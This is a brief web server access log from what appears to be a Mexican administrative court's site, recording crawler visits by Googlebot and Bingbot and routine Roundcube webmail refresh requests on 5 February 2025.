66.249.77.198 - - [05/Feb/2025:13:01:46 -0600] "GET /09260352503.shtml HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
187.195.116.142 - - [05/Feb/2025:13:02:03 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 308 152 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
187.195.116.142 - - [05/Feb/2025:13:02:04 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
40.77.167.54 - - [05/Feb/2025:13:02:14 -0600] "GET /archivo/5%20Primera%20Sala%20Administrativa%20Ordinaria/2022/07-JULIO/Listas_Julio_2022_PSOA.pdf HTTP/1.1" 301 334 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
66.249.77.199 - - [05/Feb/2025:13:02:14 -0600] "GET /18181501936.shtml HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
